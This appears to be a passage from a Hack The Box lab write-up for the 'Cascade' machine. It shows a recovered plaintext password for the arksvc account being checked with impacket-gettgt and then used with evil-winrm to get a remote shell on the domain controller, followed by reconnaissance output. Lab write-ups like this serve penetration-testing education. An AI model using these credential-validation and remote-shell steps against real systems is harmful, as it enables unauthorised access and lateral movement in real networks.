arksvc
The s.smith user had READ access to a SMB share that was serving a copy of a custom auditing program along with a DB file containing an encrypted credential. Later, I was able to recover and decrypt the encrypted password by reverse engineering the cryptographic method used in the program.
Here, I will attempt to validate the credential
┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ impacket-gettgt cascade.local/arksvc:w3lc0meFr31nd -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Saving ticket in arksvc.ccacheCredential validated
┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ evil-winrm -i casc-dc1.cascade.local -u arksvc -p w3lc0meFr31nd
Evil-WinRM shell v3.4
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\arksvc\Documents> whoami
cascade\arksvc
*evil-winrm* ps c:\Users\arksvc\Documents> hostname
CASC-DC1
*evil-winrm* ps c:\Users\arksvc\Documents> ipconfig
Windows IP Configuration
ethernet adapter local area connection 4:
connection-specific dns suffix . :
ipv6 address. . . . . . . . . . . : dead:beef::e8dc:7157:1983:a2bd
link-local ipv6 address . . . . . : fe80::e8dc:7157:1983:a2bd%15
ipv4 address. . . . . . . . . . . : 10.10.10.182
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:f330%15
10.10.10.2
tunnel adapter isatap.{603b363a-a965-4463-a4d0-a8850f844e1e}:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . :Lateral Movement made to the arksvc user via WinRM